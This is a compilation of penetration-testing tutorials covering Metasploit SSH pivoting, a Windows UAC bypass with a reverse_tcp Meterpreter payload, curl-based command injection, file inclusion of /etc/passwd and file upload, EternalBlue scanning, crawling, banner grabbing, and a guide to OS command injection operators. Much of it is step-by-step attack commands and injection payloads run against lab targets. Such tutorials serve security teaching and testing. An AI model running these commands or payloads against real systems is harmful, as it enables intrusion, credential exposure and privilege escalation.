SSH Pivoting using Meterpreter

If you are aware of SSH tunneling then you can easily understand SSH pivoting, if not then don’t worry read SSH tunneling from here.   

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.0.109

msf auxiliary(ssh_login) > set username raj

msf auxiliary(ssh_login) > set password 123

msf auxiliary(ssh_login) > exploit

From given image you we can observe that command shell session 1 opened

Now convert command shell into meterpreter shell through following command

Session –u 1

From given image you can observe that Meterpreter session 2 opened

Sessions

Hence if you will count then currently attacker has hold 2 sessions, 1^st for command shell and 2^nd for meterpreter shell of SSH server.

Check network interface using ifconfig command

From given image you can observe two network interface in victim’s system 1^st for IP 192.168.0.109 through which attacker is connected and 2^nd for IP 192.168.10.1 through which SSH client (targets) is connected.

Since attacker belongs to 192.168.0.1 interface and client belongs to 192.168.10.0 interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 192.168.10.0 network attacker need run the post exploitation “autoroute”.

This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 

msf post(autoroute) > set subnet 192.168.10.0

msf post(autoroute) > set session 2

msf post(autoroute) > exploit

This time we are exploiting SSH ignite (local client) therefore we are going to use same module for it that had used above for SSH raj, only need to change information inside exploit.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.10.2

msf auxiliary(ssh_login) > set username ignite

msf auxiliary(ssh_login) > set password 1234

msf auxiliary(ssh_login) > exploit

From given image you can see another command shell 3opened, if you will count then total attack has hold 3 sessions, two for SSH server and one for SSH client.

Sessions

1.       Command shell for SSH raj (192.168.0.109:22)

2.       Meterpreter shell for SSH raj (192.168.0.109)

3.       Command shell for SSH ignite (192.168.10.2:22)

Sessions 3

Now attacker is command shell of SSH ignite (client), let’s verify through network configuration.

Ifconfig

From given you can observe the network IP is 192.168.10.2

Pivoting is Dangerous but enjoyable network attack J

Bypass UAC in Windows 10 using bypass_comhijack Exploit

In this article we are going to bypass User Access Control (UAC) in targeted system. It is the post exploitation; hence attacker must exploit target system at first then escalate UAC Protection Bypass via COM Handler Hijack.

Let’s start!!

Attacker: Kali Linux

Target: window 10

Firstly exploit the target to receive meterpreter session of victim’s system. Once you get the meterpreter session 1 then type following command to check system authority and privileges.

getuid

getprivs

From given image you can perceive that attacker is inside the meterpreter shell of victim’s system but don’t have system/admin authorities and privileges. Hence here we need to bypass UAC Protection of targeted system.

To perform this attack you need to manually add bypass_comhijack exploit inside metasploit framework.

Copy the entire content of “bypass_comhijack” from here and past it in a text document, now save as bypass_comhijack.rb inside the following path:

usr>share>metasploit_framework>modules>exploit>windows>local

From given image you can observe bypass_comhijack.rb exploit has been saved, as attacker has his meterpreter session therefore now he can use this exploit in order to bypass UAC protection.

This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entire are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation.

Use exploit/windows/local/bypassuac_comhijack

Msf exploit (bypassuac_comhijack) > set payload window/x64/meterpreter/reverse_tcp

Msf exploit (bypassuac_comhijack) > set session 2

Msf exploit (bypassuac_comhijack) > set lhost 192.168.0.20

Msf exploit (bypassuac_comhijack) > exploit

From given image you can observe that meterpreter session 3 opened, now type following command to determine system authority privileges.

getsystem

getprivs

Wonderful!! Attacker got system/admin authorities and privileges.

Web Application Penetration Testing with cURL

cURL is a computer software project providing a library and command-line tool for transferring data using various protocols.

CURL is simply awesome because of the following reasons...

·         CURL is an easy to use command line tool to send and receive files, and it supports almost all major protocols(DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS,  IMAP, IMAPS,  LDAP,  LDAPS,  POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP) in use.

·         Can be used inside your shell scripts with ease

·         Supports features like pause and resume of downloads

·         It has around 120 command line options for various tasks

·         It runs on all major operating systems(More than 40+ Operating systems)

·         Supports cookies, forms and SSL

·         Both curl command line tool and libcurl library are open source, so they can be used in any of your programs

·         It supports configuration files

·         Multiple upload with a single command

·         Progress bar, rate limiting, and download time details

·         IPV6 Support

CURL comes by default installed in most of the distributions. If you do not have curl tool installed, then it’s a single apt-get (apt-get install curl) or yum (yum install curl) command.

For this tutorial we had used “web for pentester” to support curl command. As you known this lab is vulnerable against many website based attack therefore we had choose curl as our weapon for attack.

Let’s begin!!

Command Injection Exploitation

You must be aware command injection vulnerability which allows to execute OS based arbitrary command, type following command to check directory list in targeted system:

Curl “http://192.168.0.16/commandexec/example1.php?127.0.0.1;ls”

From given below image you can observe that it execute ping command as well as ls command, as result we found three PHP files in this directory.

Download File from URL

Curl is also use for download the data from any website or host machine, following command will download putty.exe file from website.

Curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe

HTTP Headers

Curl is use for identify HTTP method which helps in http verb tempering, type following command:

Curl -v -X http://www.google.com

From given below image you can perceive that only GET and HEAD methods are allowed on Google.

File Inclusion

This vulnerability allows an attacker to include a file on the web server, use following curl command to exploit it

Curl http://192.168.0.16/fileincl/example.php?page=etc/passwd

Hence you can observe that we found data from inside etc/passwd

HTTP Authentication

HTTP Authentication is use to inform the server user’s username and password so that it can authenticate that you're allowed to send the request you're sending. Curl is use HTTP Basic authentication. Now type following command which required username and password for login into website through curl.

Curl -data “uname=test&pass=test” http://testphp.vulnweb.com/userinfo.php

If you will notice given below image carefully you can observe that following code contains user information inside the table such as Email-ID, phone number, address and etc.

File Upload

Upload option inside in website allow uploading of any image or text on that particular website, for example uploading any image on facebook.  Use curl command to upload the putty.exe file on targeted system.

Curl -F ‘image=@/root/Desktop/putty.exe’ http://192.168.0.16/upload/example1.php

Great! You can read the highlighted text is indicating towards directory “/upload/images/putty.exe” where file has been successfully uploaded.

Open above given directory in browser as 192.168.0.16/upload/images/

Awesome! From given below you can see putty.exe is uploaded

3 ways to scan Eternal Blue Vulnerability in Remote PC

Hello Friends! As we all known that Microsoft windows 7 are exploitable by eternal blue with SMBv1. Then Microsoft patches this vulnerability by updating the SMB version. Still there are a large number of windows 7 users who didn’t update their system. Now if a security tester wants to separate vulnerable system from update system he requires some scanning to identify vulnerable system.

Eternal scanner is an network scanner for Eternal Blue exploit CVE-2017-0144 .

Target: Windows 7

Attacker: Kali Linux

Open the terminal in your kali Linux and type following command to download it from github.

git clone https://github.com/peterpt/eternal_scanner.git && cd eternal_scanner

After then when it gets successfully install you need run the script for in Oder to lunch the scanner on terminal by typing following:

./escan

Once the scanner is lunched inside the terminal further it will ask to enter target IP or you can also add a range of IPs for scanning.

We have given only single IP for scanning i.e. 192.168.1.106 as target.

Then it will start scanning and dumb those IP which are vulnerable in given IP range; from screenshot you can observe it has dump 192.168.1.106:445 as vulnerable IP with SMB port 445 and save the output inside /root/eternal_scanner/vulnr.txt

When you will open the output file you will observe vulnerable IP as well as name of exploit “MS17 -010”as shown in given image.

Similarly you can scan the target using NMAP and Metasploit

NMAP

Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.

The script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error "STATUS_INSUFF_SERVER_RESOURCES" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems.

Tested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.

Following command will scan the SMB vulnerability using in-built certain scripts and report according to the output result.

nmap -T4 -p445 --script vuln 192.168.1.106

You can observe from given screenshot that port 445 is open and vulnerable. The target is exploitable to MS17-010 moreover Rate of Risk is High which mean it is easily vulnerable.

We can direct scan for SMB vulnerability for MS17-010 using NMAP script using following NMAP command:

nmap -T4 -p445 --script smb-vuln-ms17-010 192.168.1.106

From given screenshot you will observe that it has only scan for MS17-010 and found target is vulnerable against it.

From both result of NMAP we have concluded that, the target is vulnerable due to Microsoft SMBv1. 

METASPLOIT

Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user "\" and connect to IPC$.

msf > use auxiliary/scanner/smb/smb_ms17_010

msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.106

msf auxiliary(smb_ms17_010) > set lhost 192.168.1.104

msf auxiliary(smb_ms17_010) > set rport 445

msf auxiliary(smb_ms17_010) > exploit

From screenshot you can perceive that host is vulnerable to MS17-010

Great!!! Now use MS17-010 to exploit your target.

5 Ways to Crawl a Website

A Web crawler, sometimes called a spider, is an Internet bot that systematically browses the World Wide Web, typically for the purpose of Web indexing .

A Web crawler starts with a list of URLs to visit, called the seeds. As the crawler visits these URLs, it identifies all the hyperlinks in the page and adds them to the list of URLs to visit.  If the crawler is performing archiving of websites it copies and saves the information as it goes. The archive is known as the repository and is designed to store and manage the collection of web pages. A repository is similar to any other system that stores data, like a modern day database.

Let’s Begin!!

Metasploit

This auxiliary module is a modular web crawler, to be used in conjuntion with wmap (someday) or standalone.

use auxiliary/crawler/msfcrawler

msf auxiliary(msfcrawler) > set rhosts www.tptl.in

msf auxiliary(msfcrawler) > exploit

From, screenshot you can see it has loaded crawler in order to exact hidden file from any website, for example about.php, jquery contact form, html and etc which is not possible to exact manually from website using browser. For information gathering of any website we can use it.

HTTRACK

HTTrack is a free and open source Web crawler and offline browser, developed by Xavier Roche

It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. 

Type following command inside the terminal

httrack http://tptl.in -O /root/Desktop/file

It will save the output inside given directory /root/Desktop/file

From given screenshot you can observe this, it has dumb the website information inside it which consist html file as well as JavaScript and jquery.

BLACK WIDOW

This Web spider utility detects and displays detailed information for a user-selected Web page, and it offers other Web page tools.

BlackWidow's clean, logically tabbed interface is simple enough for intermediate users to follow but offers just enough under the hood to satisfy advanced users. Simply enter your URL of choice and press Go. BlackWidow uses multithreading to quickly download all files and test the links. The operation takes only a few minutes for small Web sites.

You can download it from here.

Enter your URL http://tptl.in in Address field and press Go.

Click on start button given on left side to begin URL scanning and select a folder  to save the output file.

Fromscreenshot you can observe that I had browse C:\Users\RAJ\Desktop\tptl in order to store output file inside it.

When you will open target folder tptl you will get entire data of website either image or content, html file, php file and JavaScript all are saved in it.

WEBSITE RIPPER COPIER

Website Ripper Copier (WRC) is an all-purpose, high-speed website downloader software to save website data. WRC can download website files to local drive for offline browsing, extract website files of a certain size and type, like image, video, picture, movie and music, retrieve a large number of files as a download manager with resumption support, and mirror sites. WRC is also a site link validator, explorer, and tabbed anti pop-up Web / offline browser.

Website Ripper Copier is the only website downloader tool that can resume broken downloads from HTTP, HTTPS and FTP connections, access password-protected sites, support Web cookies, analyze scripts, update retrieved sites or files, and launch more than fifty retrieval threads

You can download it from here.

Choose “web sites for offline browsing” option.

Enter the website URL as http://tptl.in and click on next.

Mention directory path to save the output result and click run now.

When you will open selected folder tp you will get fetched css,php,html and js file inside it.

BURP SUITE SPIDER

Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.

For more detail read our privious articles from here.

From given screenshot you can observe that I had fetched the http request of http:// tptl.in; now send to spider with help of action tab.

The targeted website has been added inside the site map under target tab as a new scope for web crawling.  From screenshot you can see it started web crawling of the target website where it has collected the website information in the form of php, html and js.

5 ways to Banner Grabbing

Banner are refers as text message that received from host. Banners usually contain information about a service, such as the version number.

Banner grabbing is a process to collect details regarding any remote PC on a network and the services running on its open ports. An attacker can make use of banner grabbing in order to discover network hosts and running services with their versions on their open ports and more over operating systems so that he can exploits it.

Nmap

A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds.

The banner will be shortened to fit into a single line, but an extra line may be printed for every increase in the level of verbosity requested on the command line.

Type following command which will fetch banner for every open port in remote PC.

nmap -sV --script=banner 192.168.1.106

From screenshot you can read the services and their version for open ports fetched by NMAP Script to grab banner for the target 192.168.1.106

Following command will grab the banner for selected port i.e. 80 for http service and version.

nmap -Pn -p 80 -sV --script=banner 192.168.1.106

As result it will dumb “http-server-header: Apache/2.2.8 (Ubuntu) DAV/2”

CURL

Curl –I is use for head in order to shown document information only; type following command to grab HTTP banner of remote PC.

curl -s -I 192.168.1.106 | grep -e "Server: "

As result it will dumb “http-server-header: Apache/2.2.8 (Ubuntu) DAV/2”

TELNET

Type following command to grab SSH banner of remote PC.

telnet 192.168.1.106 22

As result it will dumb “SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1”

 NETCAT

Type following command to grab SSH banner of remote PC.

nc –v 192.168.1.106 22

As result it will dumb “SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1”

 DMITRY

DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux Command Line Application coded in C. DMitry has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and more.

Dmitry –b is use for banner grabbing for all open ports; Type following command to grab SSH banner of remote PC.

dmitry -b 192.168.1.106

From screenshot you can see it has shown banner for open port 21, 22, 23 and 25.

In this way Attacker can grab the services and their version for open ports on remote PC.

Beginner Guide to OS Command Injection

The dynamic Web applications may make the most of scripts to call up some functionality in the command line on the web server to process the input that received from the client and unsafe user input may led to OS command injection.  OS Command injection is refer as shell injection attack arise when an attacker try to perform system level commands through a vulnerable application in order to retrieve information of  web server or try to make unauthorized access into server .

Impact Analysis

Impact: Critical

Ease of Exploitability: Medium

Risk Rating: High

In this attack the attacker will inject his unwanted system level command so that he can fetch the information of web server; for example: ls , whoami , uname -a and etc.

Let’s consider a scenario where web application allows user to PING an IP other user so that it get confirms that the host connection is alive. Through given screenshot it is clear what will be output when host IP will submit.

Verify parameters to inject data

The following parameters should be tested for command injection flaws, as the application may be using one of these parameters to build a command back at the web server:

·         GET: In this method input parameters are sent in URLs.

·         POST: In this method, input parameters are sent in HTTP body.

·         HTTP header: Applications frequently use header fields to discover end users and display requested information to the user based on the value in the headers.

Some of the important header fields to check for command injection are:

·         Cookies

·         X-Forwarded-For

·         User-agent

·         Referrer

METACHARACTER

Using vulnerability scanner attacker come to know that current web application is vulnerable to command injection and try injecting system level unwanted command using Meta character.

Metacharacter are symbolic operators which are use to separate actual command from unwanted command. The ampercent (&) was used as a separator that would divide the authentic input and the command that you are trying to inject.

It will more clear in following image where attacker will inject his payload dir using metacharacter that retrieve present directory of web server.  

As result it will dump following output as shown in given image where it has validated wrong user input.

OS Command Injection Operators

The developer possibly will set filters to obstruct the some metacharacter. This would block our injected data, and thus we need to try out with other metacharacters too, as shown in the following table:

Operators	Description
;	The semicolon is most common metacharacter used to test an injection flaw. The shell would run all the commands in sequence separated by the semicolon.
&	It separates multiple commands on one command line. It runs the first command then the second command.
&&	It runs the command following  && only if the preceding command is successful
||(windows)	It run the command following || only if the preceding command fails. Runs the first command then runs the second command only if the first command did not complete successfully.
|| ( Linux)	Redirects standard outputs of the first command to standard input of the second command
‘	The unquoting metacharacter is used to force the shell to interpret and run the command between the backticks. Following is an example of this command: Variable= "OS version `uname -a`" && echo $variable
()	It is used to nest commands
#	It is used as command line comment

Steps to exploit – OS Command Injection

Step 1: Identify the input field

Step 2: Understand the functionality

Step 3: Try the Ping method time delay

Step 4: Use various operators to exploit OS command Injection

Type of Command Injection

Error based injection: When attacker injects a command through an input parameter and the output of that command is displayed on the certain web page, it proof that the application is vulnerable to the command injection. The displayed result might be in the form of an error or the actual outcomes of the command that you tried to run. An attacker then modifies and adds additional commands depending on the shell the web server and assembles information from the application.

Blind based Injection: The results of the commands that you inject will not displayed to the attacker and no error messages are returned it similar as blind SQL injection. The attacker will use another technique to identify whether the command was really executed on the server.

Mitigation-OS Command Injection

·         Strong server side validation

·         Implement a white list

·         OS Hardening

·         Use build in API’s for interacting with the OS if needed. More secure!!

·         Avoid applications from calling out directly the OS system commands